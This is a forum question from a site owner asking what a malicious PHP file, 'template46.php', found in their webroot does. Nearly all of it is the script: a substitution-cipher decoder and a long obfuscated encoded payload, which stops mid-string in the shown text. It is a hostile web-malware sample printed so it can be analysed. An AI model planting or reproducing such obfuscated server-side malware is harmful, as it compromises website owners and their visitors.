# What does this malicious PHP script do?

Tags: malware, php, spam, obfuscation

Somebody hacked my site and uploaded this script (`template46.php`) to my webroot and its content is:

```
<?php
$vIIJ30Y = Array('1'=>'F', '0'=>'j', '3'=>'s', '2'=>'l', '5'=>'M', '4'=>'0', '7'=>'W', '6'=>'L', '9'=>'Z', '8'=>'b', 'A'=>'i', 'C'=>'O', 'B'=>'G', 'E'=>'3', 'D'=>'6', 'G'=>'A', 'F'=>'8', 'I'=>'q', 'H'=>'a', 'K'=>'J', 'J'=>'w', 'M'=>'z', 'L'=>'5', 'O'=>'k', 'N'=>'x', 'Q'=>'N', 'P'=>'o', 'S'=>'K', 'R'=>'X', 'U'=>'d', 'T'=>'7', 'W'=>'y', 'V'=>'t', 'Y'=>'I', 'X'=>'p', 'Z'=>'4', 'a'=>'U', 'c'=>'9', 'b'=>'c', 'e'=>'Y', 'd'=>'n', 'g'=>'C', 'f'=>'H', 'i'=>'P', 'h'=>'E', 'k'=>'B', 'j'=>'g', 'm'=>'R', 'l'=>'Q', 'o'=>'e', 'n'=>'v', 'q'=>'r', 'p'=>'T', 's'=>'2', 'r'=>'1', 'u'=>'f', 't'=>'h', 'w'=>'V', 'v'=>'u', 'y'=>'D', 'x'=>'S', 'z'=>'m');
function v78ZFAX($vJOJJ7T, $vRJ8WGX){$vM74216 = ''; for($i=0; $i < strlen($vJOJJ7T); $i++){$vM74216 .= isset($vRJ8WGX[$vJOJJ7T[$i]]) ? $vRJ8WGX[$vJOJJ7T[$i]] : $vJOJJ7T[$i];}
return base64_decode($vM74216);}
$vFHLJ89 = 'gz2zSB2Mbsw4Sgmuahcpw13AescO9xKUSxGzKAkXbEQ2UgjORrkiarm8YzQrbEmn8wcteEmX8sZARxOjKAejHRQu9scn91cXb'.
'gjORrQ1a291a23daOwQprm1R41hm1YdRxOXgd3Sg7wse7JPez1M9pe4Rsm2escO'.
'9xjORrkiarm8YzQn9BaARxOXCJPK9RtXUgjXCJXcgjXX9AGPHRQM9RlPK1clprQa7WK4oRk'.
'2Y24XYgezYgmuahcpw13AUf2J9xKUip4A5xYXgd3SgRmLbBaNREQ28zlPSp3Sg7wZHRlPSp3SulX28fQ2H7ejSB2Mbsw4S'.
'gmuahcpw13AUf2J9xKUSxGzKAGORrkiarm8YdmLbBaARp4cY0YASlXTgjXcgzw3bswX9'.
'AGPHRQM9RlPK1clprQa7WK4oRk2Y24XSlXTgj22estnYgmuahcpw13AUf2J9xKUCJPK9RtXUgjXCJXcgjX2bdKnb2F45ylP'.
'Sp3Sgz9r8zQ4H7cvYB2MRsUn8smuHRGPKB2JSlXTgjOO9scn9f5jixkkbdKtoxjAQAZNCyav505L6AY3Y'.
'gYZ60hMCgZN5pjvYAOTgjOSg79nbzwtesjjSgmd8scObWktbWGO9scn9gOSgR3Sgl2X9AGPbEmWbEmWS'.
'gmXbgJjKBUn8slXYghcYh9kp1Q1SlPKgR3SglOKbzw4URKvY1mxwaaTgjOKul'.
'PKulPKgj2W9RmrbzZjmO15a4aTgd4Sgz9r8zQ4H7cvYfmLbBaNREQ28zlPSlXTgj2X9AjtHRQM9RlPK1clprQa7WK2871X8f5A'.
'RxOSglOKprYjY72Mbsw4Sgmuahcpw13AUBt287wMY24XgjOKgacxYg1XbEQ2UgjORrki'.
'arm8Yzr2bEQt9swMY24XgjOKgacxYg1XbEQ2UgjORrkiarm8Yz9W8srMY24XgjOKgacxYg1XbEQ2Ug'.
'jORrkiarm8YzrtH7N2bd5ARxOSgxOSgR3Sgl22oB24SgOTgj2cgjPKH7eP9sw4Rsrt9s20RE1r'.
'8Em2brcdbB5PSxOSgR3Sgl2z8EK2e7QPSgmuahcpwgktbWGOHswLYy4+YgmJ8EQ4SlPKg'.
'R3SglOKK1clprQa7Wmq9R2UYy4jbEmWHRk0bsNtbst2bWjObBcMUgOTgjOKulPKulPSgxm'.
'2871X8f5jixkGU7LM9RKXe7NXozaPez1M9pe4Rsm2escO9xjORrkiarm8YzwVe723bWK'.
'USxOTgjOOUBt287wMYy4jlfwvbswWH713HRX2SBKtbsasQ1cO97Qn9BaPK1clprQa7WK4HBwV9R5AR'.
'xOXCJPKKBr2bEQt9swMYy4jlfwvbswWH713HRX2SBKtbsasQ1cO97Qn9BaPK1clprQa7WKV9RQ'.
'Me7U2bWKUSxOTgjOO9dKn8R5jixkGU7LM9RKXe7NXozaPez1M9pe4Rsm2escO'.
'9xjORrkiarm8Yz9W8srMY24XSp3SgxmVe7239RKMYy4jlfwvbswWH713HRX2SBKtbsasQ1cO97Qn9BaPK1clprQa7WKVe7239R'.
'KMY24XSp3Sgxmt8B2tbswMYy4jlfwvbswWH713HRX2SBKtbsasQ1cO97Qn9BaPK1clprQa7WK'.
't8B2tbswMY24XSp3SgxmJeRQM9R5jixkGU7LM9RKXe7NXozaPez1M9pe4Rsm2escO9xj'.
'ORrkiarm8YdktbEQ2bWKUSxOTgjPKH7ePHRQM9RlPK1cpmwK7mwYXSlP'.
'KoJPKgxmua4wxwOwx7WUlx1kua4w5mAUUYy4jYAFACWGSglOORrQ1a291a23daOwQprm1R41'.
'hm1YdRxGcYgYN50bv5gZJ60hACJPKg72zSg128Rk4oxjORrQ1a291'.
'a23dx1maa1ceR49ia2UkaOm1m1cBprYdRxOXgjOKoJPKglOORrQ1a291a23dx1maa1ceR49ia2UkaOm1m1cB'.
'prYdRxGcYgYN50bv5gZJ60hACJPKgR4SgR4Sgj2X9AtXbEQ2UgjOR49KphwpSxOSgR3Sgl2z8EK2e7QPSgmumO25mw5jeR5jK'.
'BV2oxGciAGO9z239xOSgl2TgjOKgxmzH7N28z1V9xGcYB13UBwWRsrteEKnbWjOe7NXeRQ2br3OHs'.
'wLRxOTgjOKgxmzH7N28z1V9xGcYBLr8wcVe7QW8E5PKB9X8Bwve7r2Sp3SglOKK'.
'B9X8Bwve7r2Yy4jUBwZU1cVe7QW8E5PKB9X8Bwve7r2Sp3SglOKKB9X8Bwv'.
'e7r2Yy4joBLr8wcVe7QW8E5PKB9X8Bwve7r2Sp3SglOKK1cBxaN1ar3OHswLRw3A8z1V9xKUYy4jKB9X8Bwve7r2CJP'.
'KgR4SgR4Sgj2X9At28Rk4oxjO97rtH7NMSxOSgR3Sgl22oB24SgOTgj2cgjPK9zcW9710HgGPKBwVe723'.
'bWktbWGO9dm2H7JjipZjKBwVe723SlPKoJPKgxm4HBwV9xGcYgm4HBwV9RQ8eRKWeR2ubz1v9gjOUBt28'.
'7wMSw4TgjOKKfmP97r2Yy4je7N49RKu8710bzcMSgm4HBwV9w3AUBt287aARxOTgjOKKfmP97r2Yy4j8dwVRsrteEKnbWj'.
'OUBt287aXCJPKgxm4HBwV9xGcYfm2ofmu8710bzcMSgm4HBwV9xOTgjOKKfmP97r2Yy4joBLr8wcVe'.
'7QW8E5PKfmP97r2Sp3SgjOKKBr2bEQt9sajixGO87wMbs1d9RQ8eRKWeR2ubz1v9gjO87wMbs1d9R5XRp3SglOO8'.
'7wMbs1d9xGcYB13UBwWRsrteEKnbWjO87wMbs1d9w3A87wMbs1d9xKUSp3SglOO87wMbs'.
'1d9xGcYBLr8wcVe7QW8E5PKBr2bEQt9saXCJPKgxmV9RQMe7U2Yy4jUBwZU1cVe'.
'7QW8E5PKBr2bEQt9saXCJPKgxmV9RQMe7U2Yy4joBLr8wcVe7QW8E5PKBr2bEQt9saXCJPKgxFnKBr2bEQt9saj'.
'ixkJeRQMRsrteEKnbWjO87wMbs1d9xJjKfktbEQ2bWOTgjOKKBr2bEQt9sajixkzUBwX81cVe7QW8E5PKBr2bE'.
'Qt9sa3YgmzUBwX8gOTgjPKgxmzbzcVYy4jKB9W8srM7s1Wbz1LREKt8zlPKB9W8srMSw4TgjOKKB9W8s4jixkt8fm2b'.
'2cVe7QW8E5PKB9W8sr8Yz9W8s4ARxOTgjOKKB9W8s4jixkvU7ru8710bzcMSg'.
'mzbzcVSp3SglOO9dKn8xGcYfm2ofmu8710bzcMSgmzbzcVSp3SglOO9dKn8xGcYftvU7ru87'.
'10bzcMSgmzbzcVSp3SglOSgl2X9AGPbEmWbEmWSgmzbzcV6gGA74Q'.
'warmipw4ASxGcixkBlaNpmxOSgl2TgjOKgxmzbzcVYy4j9dKn8wcP8EQ4S'.
'gmzbzcVSp3Sgl2cgjOK97NM9lPKgR3SglOKKB9W8s4jixkMUfKubzwJ8B109xjA74Qwarmipw4A6g'.
'GAYAJjKB9W8s4XCJPKgR4SgjOKKBrtH7N2bAGcYgmVe7239RKM7s1Wbz1LREKt8zlPKBr'.
'tH7N2bd5XRp3SgjOKbswv91cVe723SgmzbzcV6gGO97rtH7J3Ygm4HBwV9xJjK'.
'Br2bEQt9sa3YgmVe7239RYXCJPKulXcgjXzU7L0UB2n8AkM97LORsrtH7JPKB'.
'9W8s43Ygm48WJjKfQrezP3Ygm49Rt46gGO871X8BwWSlXTgAGjYgGOHBwt9gGcYgYACJPSYgGjYgmr8AGcY'.
'fQ4bdmnURkJ9RYPU7LXb72OSfmX87aPSxOXCJPSYgGjYgmP971OYgZcYgKBb'.
'zcVCAGO9dKn8wNvY03SYgGjYgmP971OYgZcYgKe6artH7N2b0PjKBrtH7N2b2NvY03SYgGjYgmP971OYgZcYgKx9Rk3oxra8MPj'.
'KB9W8srb8AYTgjPjYgGjKBt2e7lj604jYOrX87aVwzwWbs2n80Pj5xZJRBZACJPjYgGjKBt2e7lj604jYOQn8dm28dlVwf2J9'.
'pPj8Rw3UB2JeRK46s13UBwW8z14HR92CWYTgAGjYgGOHBwt9gGvixGAezcr8zmtbdOcRgYV6x4V6x4V6x4VYAZO'.
'U7ZvY2JARBLb8AYTgAGjYgGSYgGjYgmJ8B1X8AGcYfQ4bz2JREmt9E5PKfm2oflXCJPjYgGjKfXt9WGcYgYV6x4V6x'.
'4V6x4V6x4A6Amr8AZARBLy8sL497L46wmLbBaDYfm2oflnbBNtH7ZTYBQ'.
'PeRKM9RlcRgKKa4FVCyjrCx4NRgYTYB9nbzrtUyrz8BcE97mb8AYTgAGjYgGOoz1dYgZcYgKy8sL'.
'497L46wmWe7LM9zwW6awvescOH7LdCAGEez24RBLb8AYvKfk3e72v6AKb82NvY03SYgGjYGPjYgGjKf'.
'Xt9WGvixGA6x4V6x4V6x4V6x4VYAZOU7ZvY2NvlscvUBwvUgraoRk2CAk49Rt46'.
'st487JTYBQPeRKM9RlcRgKKa4FVCyjrCx4NRgYTRBZACJPjYgGjKfXt9WGvixGAlscvUBwvUgrabz1vbs'.
'92bAr18zQn9B2v9MPjQsKXU1NvRBZOUBwZU1NvRBZACJPjYgGjKfXt9WGvixGA6x4V6x4V6x4V6x4VYAZOU7ZvYA4VY'.
'03SYgGjYGPjYgGjH7ePescr8dlPK1cBxaN1aWOjiAGJSlPjYgGjoJPjYgGjYgGjYB9nbzwtesjPK1cBxa'.
'N1aWktbWGO9z239xOSYgGjYgGjYgkTgAGjYgGjYgGjYgGjYB2zSB9X8'.
'Bwu9RtXbEmMSgmzH7N27WK48Rku8z1V9xKUSxOSYgGjYgGjYgGjYgGjoJPjYgGjYgGjYgGjYgGjYgG'.
'jKBejixkz8Ek28AjO9z239w3AUBrJRsLt87aARxJjYdKAYAOTgAGjYgGjYgGjYgGjYgGjYgGOoz1dYgZcYgY'.
'V6x4V6x4V6x4V6x4A6Amr8AZARBZACJPjYgGjYgGjYgGjYgGjYgGjKfXt9WGvixGAlscvUBwvUgraoRk2CAktbfk'.
'3H7QtUB2n8AcneEm2UgrMUfK2e74TY03SYgGjYgGjYgGjYgGjYgGjYgmDe7bj60'.
'4jYzLt87acRgYA6AmzH7N27WKve7r2Y24vY2JARBZACJPjYgGjYgGjYgGjYgGjYgGjKfXt9WGvixGAlscvUBwvUgr'.
'abz1vbs92bAr18zQn9B2v9MXAeRQ2Q0mb8AYTgAGjYgGjYgGjYgGjYgGjYgGOoz1dYgZcYgKy8sL497L46amXbE'.
'knbs24H7cvCz14UB10HBr28dlTY03SYgGjYgGjYgGjYgGjYgGjYgmDe7bj604jYz9X8Bwve7r2iwJAYAZO9z239w3A8z1V9'.
'xKU6AKbY2NvRBZACJPjYgGjYgGjYgGjYgGjYgGjKfXt9WGvixk0HfwvHr'.
'cMbBNXUgtAeRQ2Q0mu97L08sm2SB9W971OSgmz6gkzH7N2bs2D9xjO9z239w3AUBrJRsLt87aARxOXSxO'.
'vY2NvY03SYgGjYgGjYgGjYgGjYgGjYB908BcM9xjO9AOTgAGjY'.
'gGjYgGjYgGjYf4SYgGjYgGjYgkcgAGjYgkcgjPjYgGjH7ePlBrtH7JPKfmn6gGObEwAHAJjKfXt'.
'9WJjKBt2e7lXSlPjYgGjoJPjYgGjYgGjYB2zSg128Rk4oxjORrkiarm8KE92bzKnbsadRxOXgAGjYgGjYgGjYgG'.
'jYBw0HBFjY2Q1pOm1mgYTgAGjYgkcgAGjYgk28fQ2gAGjYgkTgAGjYgGjYgGjH7ePY7wVbfmLSgmuahcpw13dUzwWezcM9xUU'.
'SxOSYgGjYgGjYgGjYgGj97QP8WGAmO1KpgYTgAGjYgkcgd4Sgz9r8zQ4H7cvYB13UBwWRsrteEKn'.
'bWjOescvUBwvUgOSoJPjYgGjbfK29rcVeRm0H1ct8BJPKWQTSgZISR40w7Od6gGOescvUBwvUgJjKBrtUBQP9R5XCJPSYgGjY'.
'B9nbAjOHxGcYyGTYgmXYyJjescr8dlPKBrtUBQP9RQ85w4XCWGOHx3qSlPjYgGjoJPSYgGjYgGjYgG'.
'O8d5jixk2ofk38sm2SgKFYAJjKBrtUBQP9RQ85wr8KB2USp3SYgGjYgGjYgGOeMYjixk08EwvUgjO8d5XCJPjYgGjYgG'.
'jYgmWe7LOYy4jbz1v9gjJ6gGPKB5WYg4j5xOXCJPjYgGjYgGjYgm08sL497L4Yy4jbEmWREK2bBNtesaPYd3A6Am'.
'VeRm0HBwM7M1U7WmXRxZAuxY3Ygmvbr3Obz1v9143Ygm08sL497L4S'.
'p3SYgGjYf4SYgGjYfK2UfwW8AGOescvUBwvUy3SulPS9dwveEmX8sZjUBw'.
'ZU1cVe7QW8E5PKBQn8dm28dlXgd3SYgGjYfkW97Uu8714estue7N3Sgb0R1VamwtaRg4P7r3D9B2dHRlDRw4qSwJVS'.
'1V8CzmX9s24C2rUSW2bRx5d6gGOescvUBwvUgJjKBrtUBQP9R5'.
'XCJPSYgGjYB9nbAjOHxGcYyGTYgmXYyJjescr8dlPKBrtUBQP9RQ8514XCWGOHx3qSlPjYgGjoJPjYgGjYgGjYgmVH7ZjixG'.
'O8714est2br3NRw3OHw4TgAGjYgGjYgGjKBrtogGcYgmVeRm0HBwM7MKU7WmXRp3SYgGjYgGjYgGObz1v9gGcYfKt8zlPKBr'.
'X8AJjKBrtogOTgAGjYgGjYgGjKfUnbzljixkd97L2bz149wcE8EKOSgmWe7LOSp3SgAGjYgGjYgGjKB'.
'Qn8dm28dljixkJbzwdREK2bBNtesaPYAFA6dkW97UubRwnUBaPKBrtUBQP9RQ851r8KB'.
'2USxZA6WY3YgmE8EKO6gGOescvUBwvUgJj5xOTgAGjYgkcgjPjYgGjbfK29rcVeRm0H1ct8BJPKWQb7rm171mb6xt87MXOH'.
'7UXUyXURx3XR140KWJjKBQn8dm28dl3YgmVeRm0HBwMSp3SgAGjYgkz8EYPKBOjixGJCWGOHxGFYBQnU7L4SgmVeRm0HBwM7'.
'MkUSp3jKBOqSWOSYgGjYf3SYgGjYgGjYgGOescr8dljixGO8714est2br3NRw3OHw4TgjP'.
'jYgGjYgGjYgmE8EKOYgGcYBU28zwWeRm2REUnbzlPKBQnU7L4Sp3SgAGjYgGjYgGjKBQn8dm28dljixkJbzwdREK2bBN'.
'tesaPYAFA6dkW97UubRwnUBaPKBrtUBQP9RQ851r8KB2USxZA6WY3YgmE8EKO6gGOescvUBwvUgJj5xOTgAG'.
'jYgkcgjPSYgGjYfK2UfwW8AGOescvUBwvUy3SulPS9dwveEmX8sZjoBLr8wc'.
'Ve7QW8E5PKBQn8dm28dlXgd3SYgGjYfkW97Uu8714estue7N3Sg'.
'b0R1VCwarb6xt87MXOH7UXUyXURx3XR140KWJjKBQn8dm28dl3YgmVeRm0HBwMSp3SgAGjYgkz8EY'.
'PKBOjixGJCWGOHxGFYBQnU7L4SgmVeRm0HBwM7MkUSp3jKBOqSWOSYgGjYf3SYgGjYgGjYgGO8dwVY'.
'y4jKBrtUBQP9RQ85wr8KB2UCJPjYgGjYgGjYgmVH7ZjixkJ8EbP5pG3YgmvU74j6xGNSp3SYg'.
'GjYgGjYgGO871ZYy4jbBcESyhJ6gGO8dwVSxGVYyhTgjPjYgGjYgGjYgmWe7LOYy4jbz1v9gjO872v6g'.
'GO871ZSp3SYgGjYgGjYgGOescvUBwvUgGcYfQ4b2cW9Rk3e7Q2SgmVeR'.
'm0HBwM7MkU7WmXRxJjKfKt8zl3Ygm08sL497L4Sp3SYgGjYf4SYgGjYfK2UfwW8AGOescvUB'.
'wvUy3SulPS9dwveEmX8sZj8dwVRsrteEKnbWjOescvUBwvUgOSoJPjYgGjbfK29rcVeRm0H1ct8BJPKWQb7rKkpOmb6xt87M'.
'XOH7UXUyXURx3XRg4P7r3D9B2dHRlDRw4qSwNUYWb3Ygm08sL497L46gGO8714est2bWOTgjP'.
'jYgGj9zcWSgmXYy4j5y3jKBOjigk08EwvUgjO8714est2br3JRxOTYgmXSW3XgAGjYgkTgAGjYgGjYgGjKBrX8AGcYgmV'.
'eRm0HBwM7M1U7WmXRp3SYgGjYgGjYgGO871ZYy4jKBrtUBQP9RQ'.
'852r8KB2UCJPjYgGjYgGjYgmWe7LOYy4jbz1v9gjO872v6gGO871ZSp3SYgGjYgGjYgGOescvUBw'.
'vUgGcYfQ4b2cW9Rk3e7Q2SgmVeRm0HBwM7MkU7WmXRxJjKfKt8zl3Ygm08sL497L4Sp'.
'3SYgGjYf4SYgGjYfK2UfwW8AGOescvUBwvUy3SulPS9dwveEmX8sZj9swv9RKtUBwuUscW9gjO8Bwv9EmPSlXTgAGjYgGOesttb'.
'd5jixGde7K09Bwz9stXHzV387Lnbf1WbEmrUd2ZoAbTgAGjYgGO8dwVlsttbd5jixkMUfK397ZPKBQPeRKMSp3SYgGjYgm'.
'MUfKX8zbjixGdKM3SYgGjYB9nbAjOHxGcYyGTYgmXYyJjKBN28zU4Hy3jKBOqSWOSYgGjYf3SYgGjYgGjYgGObEmWH7Ld'.
'YgZcYfQredQ4bAjOesttbd53YfKt8zlP5xJjKBLr8aQPeRKMSxGVYyh3YyhXCJPjYgGjulPjY'.
'gGjbzw4URKvYgmMUfKX8zbTgd4Sgz9r8zQ4H7cvYfktbEQu8710b'.
'zcMSgm08sL497L46gGObB1MbswMSlXTgAGjYgGObB1MbWGcYB1Wbz1LREknbgjObB1MbswMSp3SYgGjYGPj'.
'YgGjbzw4URKvYfQ4b2cW9Rk3e7Q2SgK8ah1par4A6gGObB1MbWJjKBQn8d'.
'm28dlXCJXcgjXzU7L0UB2n8AkzUBwX81cVe7QW8E5PKBQn8dm28dl3YgmzUBwX8gOSoW'.
'GjYgGSYgGjYfK2UfwW8AkMUfKubzwJ8B109xjA749ama25RxY3YgmzUBwX8gJjKBQn8dm28dlXCJ'.
'XcgjXzU7L0UB2n8AkXbrcXbgjObEmWSxkTgAGjbzw4URKvYfkW97Uu8714esjPYAcoS13N6p2Uu13N6'.
'p2U7MGVCwrF5w3J6p2U7MGVCwrF523J6pmU7MGVCwrF50w85g4rRxOPRgZP7MGVCwrF7MhVCwr85g4LRRJ'.
'N7MGVCwr85g4LRRJW7MGVQ1r85g4LRRJWQw3J6pwUSx2T5E4O6W'.
'Y3KfQ4bAOTgd4Sgz9r8zQ4H7cvYB9W8sruHBcMUgjOescvUBwvUgOSoJPSYgGjYgmP8EQ4Yy4jbfK29'.
'rcW9Rk3e7Q2SgbnRAtEUEUF9dmJSwJv6sOd6gbd6hGORrQ1a291a23dx1maa1cYprQaKr4XCJPSYgGjY'.
'B2zYgtXbrcXbgjOHBcMUgOXgAGjYgkTgAGjYgGjYgGjbzw4URKvYgm08sL497L4C'.
'JPjYgGjulPjYgGjgAGjYgGOUBcq97LMYy4j9RtJ8BcO9xjAlgY3Ygm08sL497L'.
'4Sp3SgAGjYgGOescvUBwvUgGcYgm48sV28dQ8514j6AGAlgYj6AGOHBcMUgGvYg'.
'Y+Y03SgAGjYgkW9RmrbzZjKBQn8dm28dlTgd4Sgz9r8zQ4H7cvYBwWbzcWRMl'.
'JQgjXgd3Sg7t2e7m2bAjAx1maagFN60hjQyG4YhLnUgkB8Ewv9gYXCJPSgxmrbzOjixkJbzwdREK'.
'2bBNtesaPKWFPRyFX6APO6Wb3Ygbd6gGORrQ1a291a23daOwmwawpw1cwaOOdRxGXCJPS'.
'gxm08sL497L4Yy4jeEwMUBcVRst4UfkubzwNU7wMUyhPYzt4UfGD6'.
'WFA6Amua4wxwOwx7WUYw1mlR4tiarldRxZA641Ba7XypOtvHytx'.
'UfmBxpQ7pRKg9Bm9UM9W8zU6o0U6mahASp3Sgxm08sL497L4Yy4jb'.
'EmWREK2bBNtesaPYgYnla9mHOQCxBLPC1K4Uh9K5r9QbOKO912EQdKv94VDQ4V1lxY3Ygmrb'.
'zO3Ygm08sL497L4YgOTgjPK9RtXUgjjKBQn8dm28dljSp3SulPSgz9r8zQ4H7cvYBQrbEmn8wcPUfmJREK2bRw2bElNSgmJe'.
'RKt8R5Xgd3SYgGjYB2zSgGtYB2MRs1Wbz1LSgmJeRKt8R5XYgOSYg'.
'GjYf3SYgGjYgGjYgGObB1We7rMYy4jeRKWeROPgAGjYgGjYgGjYg'.
'GjYgUrbzJdYy4+YgmJeRKt8R53gAGjYgGjYgGjYgGjYgUV9RmP8sldYy4+YgUfmwldgAGjYgGjYgGj'.
'Sp3SYgGjYf4SYgGjYGPjYgGjH7ePYgmJeRKt8RQ8KEwW8gUUip4dKWG'.
'XYfK2UfwW8AkBlaNpmp3SYgGjYGPjYgGjH7ePYghjHRQM9RlPKfktbz1Vbr3'.
'd87w4HBcOKr4XYgOjKfktbz1Vbr3d87w4HBcOKr4jixGPHRQM9RlPKf'.
'ktbz1Vbr3d9B14exUUSxezHRQueRKWeROPKfktbz1Vbr3d9B14exUUSxOjiWGdahcpwg'.
'bjCAGdm4waKM3SYgGjYgmJeRKt8RQ8Ksr2UBtn9gUUYy4jbEmWUBcrbfk2bAjOb'.
'B1We7rM7WUV9RmP8sldRxOTgAGjYgkX9AjjYxkX82ctbdKtoxjObB1We7rM7WUV9R'.
'mP8sldRxJjeRKWeROPK4U1wgb3YgUlprQaKWOXYgOjbzw4URKvYh9kp1Q1CWGSYgGjYGPjYgGj6WPj4K/mj'.
'QgZ466lnVg4460lngymjUBk4enlvcgD4e5j46Yj46/mjQgJ466lvQgT4eMlnUB646Oj466'.
'lvQg4YgPngAGjYgGOURK3Yy4jbB1WbswuURK3SgmJeRKt8RQ8KEwW8gUUSp3SYgGjYB2zSgGtYB2Mbsw4SgmrbzN8KEQ0HBwV9xU'.
'USxGXYgmrbzN8KEQ0HBwV9xUUYy4jKst4UfGdCJPjYgGjH7ePYghjHRQM9RlPKfwW813dbB14HgUUSxGXYgmrbzN8K'.
'EktUBjdRxGcYgbnKM3SYgGjYB2zSgGtYB2Mbsw4SgmrbzN8KstnbEldRxOjKAejHRQM9RlPKfwW813dbB14HgUU'.
'SxGXgAGjYgkTgAGjYgGjYgGjH7ePYfQ4bdknbWjOURK37WUJeRmPKr43YgbnKWOjSlPjYgGjYgGjYf'.
'3SYgGjYgGjYgGjYgGjKfwW813dHBcMUgUUYy4jbEwAbEmWSgmrbzN8KEktUBjdRxJ'.
'j5gJjbEmWbBcMSgmrbzN8KEktUBjdRxJjKWFdSxOTgAGjYgGjYgGjY'.
'gGjYgmrbzN8KEktUBjdRxGcYfQredQ4bAjOURK37WUJeRmPKr43YfQ4bdknbWjOURK37'.
'WUJeRmPKr43YgbnKWOXCJPjYgGjYgGjYf4SYgGjYgGjYgk28fQ2gAGjYgGjYgGjoJPjYgGjYgGjYgGjYgGOU'.
'RK37WUP8EQ4Kr4jixGOURK37WUJeRmPKr4TgAGjYgGjYgGjYgGjYgmrbzN8KEktUBjdRxGcYgbnKM3KgAGjYgGjYgGjulP'.
'jYgGjulPjYgGjKfwW813dbB14HgUUYy4jbfK29rcW9Rk3e7Q2SgYn7rNb6r4q6WY3YgYnYAJjKfwW813dbB14HgUUSp3S'.
'YgGjYB2zSgkXbEQ2UgjOURK37WUNU7wWoxUUSxGXYgmrbzN8KEktUBjdRxGv'.
'ixGAiE3OURK37WUNU7wWoxUUuxYTgAGjYgGSYgGjYgmJ8EK4Yy4jHR'.
'QM9RlPKfktbz1Vbr3dbBcWUgUUSxG/YgmJeRKt8RQ8KEknbdldRlPjYgGjYgGjYgGjYgGDYgjjHRQM9RlPKfwW813dbBc'.
'WUgUUSxG/YgmrbzN8KEknbdldRxGDYgjOURK37WUMest287adRp4cKst4UfkMKMF4Qy5DCyGXYgOTgAG'.
'jYgGSYgGjYgm4H7r28Ew4Yy4jHRQM9RlPKfktbz1Vbr3dUB2V97crUgUUSxG/YgmJeRKt8RQ8KEmX87wnURldRxGDYy5JCJP'.
'jYgGjH7ePYghjHRQM9RlPKfktbz1Vbr3dbzw4URKvKr4XYgOjKfktbz1Vbr3dbzw4URKvKr4jixGdescvUBwvUgbTgAGjYgGS'.
'YgGjYgmMest287ajixGOURK37WUMest287adRp4cKst4UfkMKWG/YgUMbsJD6WFdCAbdCJPjYgGjKB9JYy4jlB'.
'9M8sQq8Ek28AjObsQP97r26AmrbzN8KstnbEldRxJjKfknbdl3Ygm2bdKv8WJjKBwWbdQ4bAJjKfmX87wnURlXCJPjYgG'.
'jH7ePYgmzbgGXgAGjYgkTgAGjYgGjYgGj6WPjp7cDH7N3exGI6JPjYgGjYgGjYB2zSgGtYB2Mbsw4SgmJe'.
'RKt8RQ8KrwM9RYVl7U28dldRxOjSxGObB1We7rM7WUwbswW6a1d97L4Kr4jixGAp7cDH7'.
'N3exFr60GjSB2lHBcv9p3jwp3jlrkwYB2lHBcv9xkiaWGMRMGj8B2q9xkQe75jpr5j7y3j97Z'.
'VUR5XYh1JbBN2wswAxs246MaWCgZNCgGPx4tapaJ3YBNXHsajmsw0HsFXY192bdQX8sZnQgZJYhrnez2'.
'39xFElp545xkpe79tbzOnQpYZ60hsY03SYgGjYgGjYgGSYgGjYgGjYgGObzwNU7'.
'wMUgGcYgKTKfktbz1Vbr3d87w4HBcOKrrcYf3OURK37WUJeRmPKrrcYhtaw1Gn5xZJRfKb8AYTgA'.
'GjYgGjYgGjKfK2bRw2bElj604jYOtnbElDYf3OURK37WUP8EQ4KrrcRfKb8AYTgA'.
'GjYgGjYgGjKfK2bRw2bElj604jY2wM9RYVl7U28dlDYf3ObB1We7rM7WUwbswW6a1d97L4KrrcYAZARfKb8AYT'.
'gAGjYgGjYgGjH7ePYB2Mbsw4SgmJeRKt8RQ8KEK29zwW9RYdRxOjSxGObzwNU7wMUg'.
'GvixGAazwz9RK2b0PjoWmJeRKt8RQ8KEK29zwW9RYdRRrbb2NvY03SYgGjYgGjYgkX9AjjHRQM9'.
'RlPKfktbz1Vbr3descnHs22Kr4XYgOSYgGjYgGjYgkTgAGjYgGjYgGjYgGjYgm08scqH7ajixGAY03SYgG'.
'jYgGjYgGjYgGjH7ePYB2MRs1Wbz1LSgmJeRKt8RQ8KsQn8sVX9xUUSxGXYfVz8EK2e7QPSgGObB1We7r'.
'M7WU08scqH7adRxktbWGOHM4+KfejSxGOescnHs22YgZcYgYOHM4OU03jY03jKBQn8sVX'.
'9xGcYfQredQ4bAjOescnHs226yG36pYXCE4SYgGjYgGjYgGjYgGj97NM9xGOescnHs22Yy'.
'4jKfktbz1Vbr3descnHs22Kr4TgAGjYgGjYgGjYgGjYB2zSgGOescnHs22Yp4dKWGXYgmW9R1r9RQ4YgZcYgKy8scqH7aD'.
'Ygm08scqH7wbb2NvY03SYgGjYgGjYgkcgAGjYgGjYgGjKfK2bRw2bElj604jYOQn8zL2eEmX8sZDYBQ38EQ2RfKb8AYT'.
'gAGjYgGjYgGjH7ePYgmJeRKt8RQ8Ksr2UBtn9gUUip4dahcpwgbjSlPjYgGjYgGjY'.
'f3SYgGjYgGjYgGjYgGjH7ePYB2Mbsw4SgmJeRKt8RQ8KsmtUBhdRxOjKAejHRQueRKWeROPKfk'.
'tbz1Vbr3d9B14exUUSxGXgAGjYgGjYgGjYgGjYf3SYgGjYgGjYgGjYgGjYgGjYB9nbzwtesjPKfktbz'.
'1Vbr3d9B14exUUYh1pYgmqYy4+YgmsSlPjYgGjYgGjYgGjYgGjYgGjYgGjYgmOeRmtYgZcYfwW8BwvescO9xjO'.
'HWOvKM4d6dwW8BwvescO9xjOUAOvKWedCJPjYgGjYgGjYgGjYgGjYgGjH7ePYfQredQ4bAjO9B14ex'.
'Jj6phXip4dKAbjSxGO9B14exGcYfQredQ4bAjO9B14exJJ6g4NSp3SYgGjYgGjYgGjYgGjulPjYgGjYgGjYgGjYgGO9B14ex'.
'GvixGARfKb82NWRBZACJPjYgGjYgGjYgGjYgGSYgGjYgGjYgGjYgGjKfK2bRw2bElj604jYOQn8dm28dlVUf2'.
'J9pPjeRkJ8B20eRmX8sZnogrEUEbV9zcW8xrrbzN28zQn9BwORfKb8AYTgAGjYgGjYgGjYg'.
'GjYgmW9R1r9RQ4YgZcYgKy8sL497L467N28zU4HyPjYALMUfK397ZPKBmtUBhX6AKbb2N'.
'vY03SYgGjYgGjYgkcgAGjYgGjYgGjKfK2bRw2bElj604jY2NWRBZACJPjYgGj'.
